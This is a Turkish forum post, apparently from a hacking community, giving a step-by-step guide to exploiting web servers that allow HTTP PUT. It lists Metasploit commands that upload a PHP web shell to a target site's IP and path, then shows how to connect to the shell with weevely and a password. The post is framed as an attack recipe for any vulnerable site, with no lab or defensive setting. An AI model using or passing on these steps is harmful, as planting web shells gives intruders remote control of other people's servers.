PUT Exploit saldırısı

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Katılım
23 Mar 2020
Tepki puanı
8
Rating - 0%
Eğer put exploit açığı bulduğunuz bir site varsa göstereceğim adımları uygulayın.

Msfconsol programını açın..

msf > use auxiliary/scanner/http/http_put
msf > set rhosts "HEDEF SİTENİN İP ADRESİ" /ÖRNEK : set rhosts 192.168.45.31
msf > set path "AÇIĞIN OLDUĞU YER" / ÖRNEK : set path /get/
msf > set filename "SHELL DOSYASI" / ÖRNEK : set filename makassar.php
msf > set filedata file://root/Desktop/shell2.php / Siz eğer parrot vs kullanıyorsanız (cd desktop yazın ve sonra pwd yazın /User/root/Desktop/shell2.php)
msf > exploit

İŞLEM OLDUKTAN SONRA : ~# weevely http://hedefsite.com/path/makassar.php "ŞİFRE" / ÖRNEK : weevely http://hedefsite.com/path/makassar.php 12345

Ve işlem tamamlanmıştır.
 
  • Like
Tepkiler: WyX
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
131,612Konular
3,269,676Mesajlar
315,566Kullanıcılar
DaeZSon Üye
Üst Alt